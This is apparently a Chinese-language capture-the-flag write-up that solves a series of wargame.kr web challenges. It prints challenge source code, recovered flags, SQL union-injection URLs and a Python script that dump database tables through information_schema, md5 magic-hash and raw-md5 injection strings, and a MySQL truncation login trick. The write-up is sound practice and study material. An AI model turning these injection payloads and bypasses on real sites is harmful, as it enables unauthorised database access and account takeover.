只有周末可以做一做来着
already got
FLAG:3f271a824852c299e2aa7dde0f3d1d6150527cc9QR Code Puzzle
首先看到一个这玩意
蒙蔽了,难道是拼图…
肯定不是自己去拼…找源码看到了图片的位置
http://wargame.kr:8080/qr_code_puzzle//img/qr.png
Flag is : e0b5b5c5939d3a041f570a267d8f6af6d336686cflee button
真是够了,首页一个按钮想要按倒,机智的我都用了手机了,但是没用,直接看源码,没啥特别的啊!但是看了一下发现这个
而且晃动鼠标的时候还会跟着变化~查一下资料css 中position如下
这个随着鼠标移动应该是eval那句话所赐,我们去掉position这句就可以发现button固定了。点击得到flag,这属于前端修改的题目
good! Flag is : 7f7d57ba6486e5a1e9021f7cc3cbaf8aada38e71login filtering
首先得到源码
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
/*
create table user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);
*/
if(isset($_POST['id']) && isset($_POST['ps'])){
include("../lib.php"); # include for auth_code function.
mysql_connect("localhost","login_filtering","login_filtering_pz");
mysql_select_db ("login_filtering");
mysql_query("set names utf8");
$key = auth_code("login filtering");
$id = mysql_real_escape_string(trim($_POST['id']));
$ps = mysql_real_escape_string(trim($_POST['ps']));
$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));
if(isset($row['id'])){
if($id=='guest' || $id=='blueh4g'){
echo "your account is blocked";
}else{
echo "login ok"."<br />";
echo "Password : ".$key;
}
}else{
echo "wrong..";
}
}
?>
<!DOCTYPE html>
<style>
* {margin:0; padding:0;}
body {background-color:#ddd;}
#mdiv {width:200px; text-align:center; margin:50px auto;}
input[type=text],input[type=[password] {width:100px;}
td {text-align:center;}
</style>
<body>
<form method="post" action="./">
<div id="mdiv">
<table>
<tr><td>ID</td><td><input type="text" name="id" /></td></tr>
<tr><td>PW</td><td><input type="password" name="ps" /></td></tr>
<tr><td colspan="2"><input type="submit" value="login" /></td></tr>
</table>
<div><a href='?view-source'>get source</a></div>
</form>
</div>
</body>
<!--
you have blocked accounts.
guest / guest
blueh4g / blueh4g1234ps
-->看到首先是源码的末尾存在帐号密码
关键语句如下
...
$id = mysql_real_escape_string(trim($_POST['id']));
$ps = mysql_real_escape_string(trim($_POST['ps']));
$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));
if(isset($row['id'])){
if($id=='guest' || $id=='blueh4g'){
echo "your account is blocked";
}else{
echo "login ok"."<br />";
echo "Password : ".$key;
}
...因为过滤了…注入几乎是不可能的…但是我们看到帐号和密码是开的,而数据库的特性不分大小写嗯,然后过滤仅仅是帐号!那么我们帐号用大小写绕过,密码不变即可
Password : fabe12ce1829b8c7b1a3cf2eb8f94d13abe0820fWTF_CODE
发现是whitespace,这个是2014年的题目了嗯
找到一个解密网站
http://ws2js.luilak.net/interpreter.html
Wow! Key is 1cc49fa63caf553bd0d75b7b38f818118528a988 (this key is for [] only..)为了一方万一收藏了一段python的解密代码
def t2i(str):
out = 0
for i in range(0,8):
out += int(str[i])*(2**(7-i))
return out
f = open('source_code.ws','r')
x = f.readline()
ans=""
k = 0
while x:
out = ''
for c in x:
if c==' ':
out += '0'
else:
out += '1'
x = f.readline()
l = len(out)
if 8 <= l <= 11 and k%2 ==0:
print out
c = t2i('0'+out[l-8:l-1])
ans+= chr(c)
k+=1
f.close()
print ans学习了
DB is really GOOD
这个题目什么鬼…没有源码,只能对着两个可以输入的地方尝试特殊字符,在首页输入/之后报错
再构造如下
user_id=asd/
返回
<br />
<b>Fatal error</b>: Uncaught exception 'Exception' with message 'Unable to open database: unable to open database file' in /home/www/db_is_really_good/sqlite3.php:7
Stack trace:
#0 /home/www/db_is_really_good/sqlite3.php(7): SQLite3->open('./db/wkrm_asd/....')
#1 /home/www/db_is_really_good/memo.php(14): MyDB->__construct('./db/wkrm_asd/....')
#2 {main}
thrown in <b>/home/www/db_is_really_good/sqlite3.php</b> on line <b>7</b><br />可以看出来这是在构造一个访问路径,然后我们尝试admin的时候发现
猜测就是哪个路径吧…然后这里访问不到我们直接用浏览器打开就行了
随便打开一看
http://wargame.kr:8080/db_is_really_good/dhkdndlswmdzltng.php
fly me to the moon
需要你分数足够高嗯,以为是代码中暗藏玄机,大5000行代码啊!!!但是发现并不是…它每次游戏完成后会发送分数…
日修改分数即可,什么破题…
md5_compare
首先看到源代码如下
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
if (isset($_GET['v1']) && isset($_GET['v2'])) {
sleep(3); // anti brute force
$chk = true;
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
if (!ctype_alpha($v1)) {$chk = false;}
if (!is_numeric($v2) ) {$chk = false;}
if (md5($v1) != md5($v2)) {$chk = false;}
if ($chk){
include("../lib.php");
echo "Congratulations! FLAG is : ".auth_code("md5_compare");
} else {
echo "Wrong...";
}
}
?>
<br />
<form method="GET">
VALUE 1 : <input type="text" name="v1" /><br />
VALUE 2 : <input type="text" name="v2" /><br />
<input type="submit" value="chk" />
</form>
<br />
<a href="?view-source">view-source</a>
就是一个简单的md5匹配,默默地拿出来自己的记录搜索到
如下
http://wargame.kr:8080/md5_compare/?v1=QNKCDZO&v2=240610708md5 password
还是md5?明显原来的某题,带盐的md5加密构造注入!!!但是我为啥找不到了…在这里再记录下
ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串: 'or'6<trash>
意图很明显了嗯
strcmp
这个…嗯…太基础了…
type confusion
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
if (isset($_POST['json'])) {
usleep(500000);
require("../lib.php"); // include for auth_code function.
$json = json_decode($_POST['json']);
$key = gen_key();
if ($json->key == $key) {
$ret = ["code" => true, "flag" => auth_code("type confusion")];
} else {
$ret = ["code" => false];
}
die(json_encode($ret));
}
function gen_key(){
$key = uniqid("welcome to wargame.kr!_", true);
$key = sha1($key);
return $key;
}
?>猛一看还是很吓人的,碰巧鸡哥来了一下宿舍顺手搞了一下,弱类型比较,数字和字符串可以相等嗯,虽然是$key是随机的,但是只要我们碰撞试前面的数字相同就可以了嗯
会发现本地实验通过,但是并不可以在浏览器通过,用burp抓包来着嗯,多试试啊!
tmitter
这个很明显了嗯
you need login with "admin"s id!
===========================
create table tmitter_user(
idx int auto_increment primary key,
id char(32),
ps char(32)
);就是因为mysq数据截断,可以申请一个账号
admin a然后截断就成了admin,通过修改密码成功修改密码嗯,然后登陆得到flag
SimpleBoard
说是union注入…emmmm
感觉莫名其妙的,真的以为是update是注入点…结果并不是,关键代码是如下的,看了狗哥的做法发现真特么…
public function read($idx){
$idx = mysql_real_escape_string($idx);
if ($this->read_chk($idx) == false){
$this->inc_hit($idx);
}
return $this->db->get_query("select * from {$this->table} where idx=$idx");
}
private function read_chk($idx){
if(strpos($_COOKIE['view'], "/".$idx) !== false) {
return true;
} else {
return false;
}
}发现其实这是脆弱的,如何返回true?其实就是从cookie中验证了一下!只要cookie中的内容是/加上url内容即可,我们做以下尝试
GET /SimpleBoard/read.php?idx=0%20union%20select%201,1,1,1 HTTP/1.1
Host: wargame.kr:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://wargame.kr:8080/SimpleBoard/
Cookie: view=%2F0%20union%20select%201,1,1,1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
得到
然后就是注入任我行了,直接上脚本
#_*_ coding:utf-8 _*_
import requests
import urllib
import re
url = 'http://wargame.kr:8080/SimpleBoard/read.php?idx='
for i in range(100):
#content = '0%20union%20select%201,1,1,table_name%20FROM%20information_schema.tables%20limit%20'+str(i)+',1'
#content = '0%20union%20select%201,1,1,column_name%20FROM%20information_schema.columns%20where%20table_name=0x524541444d45%20limit%20'+str(i)+',1'
content = '0%20union%20select%201,1,1,flag%20FROM%20README%20limit%20'+str(i)+',1'
urlnew=url+content
cookies = {'view':'/'+content}
html = requests.post(url=urlnew,cookies=cookies).text
html = re.findall(r'<td colspan=3>(.*?)</td>',html,re.S)[0]
if html!='':
print html
else :
break
#table README
#columns flagweb chatting
看到题目首先真的一头雾水,一看源码,难道是异步传输的东西?
但是人家明明说是注入,然后发现源码中存在一些网址,嗯
chatlog.php?t=1
chatview.php?t=1&ni=
chatlog.php?data=1尝试发现第二个存在注入…构造
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,2,3,4,5%23
发现第2、3列是注入点(当然也可以盲注,但是费劲死了…)
然后就是任我行了
//爆表
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,table_name,3,4,5%20from%20information_schema.tables%23
//爆列
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,column_name,3,4,5%20from%20information_schema.columns%20where%20table_name=0x636861745f6c6f675f736563726574%23
//爆字段
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=0%20union%20select%201,readme,3,4,5%20from%20chat_log_secret%20%23pyc decompile
这个以为是逆向题,但是也不算是,是python关于时间种子的东西,首先我们可以得到pyc文件,打开一瞬间貌似访问了服务器网址,然后直接用easy python compiler去逆向出来程序如下
import time
from sys import exit
from hashlib import sha512
def main():
print 'import me :D'
def GIVE_ME_FLAG(flag):
if flag[:43] != 'http://wargame.kr:8080/pyc_decompile/?flag=':
die()
flag = flag[43:]
now = time.localtime(time.time())
seed = time.strftime('%m/%d/HJEJSH', time.localtime())
hs = sha512(seed).hexdigest()
start = now.tm_hour % 3 + 1
end = start * (now.tm_min % 30 + 10)
ok = hs[start:end]
if ok != flag:
die()
print 'GOOD!!!'
def die():
print 'NOPE...'
exit()
if __name__ == '__main__':
main()这个得到了这个就没什么好说的了嗯…就是利用了时间戳制造了一个散列值啥的,直接上脚本即可,时间还是相当宽松的嗯
#_*_ coding:utf-8 _*_
import time
from sys import exit
from hashlib import sha512
import re,urllib
url = 'http://wargame.kr:8080/pyc_decompile'
html = urllib.urlopen(url).read()
content = re.findall(r'2017/(.*?)/(.*?) (.*?):(.*?):',html,re.S)
hour = str(content[0][2])
minite = str(content[0][3])
seed = content[0][0]+'/'+content[0][1]+'/HJEJSH'
hs = sha512(seed).hexdigest()
start = int(hour) % 3 + 1
end = start * (int(minite) % 30 + 10)
ok = hs[start:end]
newurl = url+'/?flag='+ok
html = urllib.urlopen(newurl).read()
print html
#print newurl 实在不行可以用这个生成url再手动访问一下img recovery
看题面
Recovery the PNG image file!
but.. is this really "PNG" file?
(NO STEGANOGRAPHY. THIS IS FORENSIC CHALLENGE)引起了深深的怀疑,binwalk一发
发现了zlib数据来着,但是尝试去解码没什么效果,然后继续看hex值…没发现,参考了大神方法…原来是…
然后搜索一下…
japan r119发现是一种文件格式
然后就需要解密这个apng了
http://animizer.net/en/gif-apng-splitter
然后得到两个图片,拼接一下即可,用stagsolve.jar神器异或一下即可,但是得到的二维码黑白颠倒,最简单的扣扣发一下,然后选中一下即可
得到内容
WHAT!@#$?输入网站即可
这算哪门子web…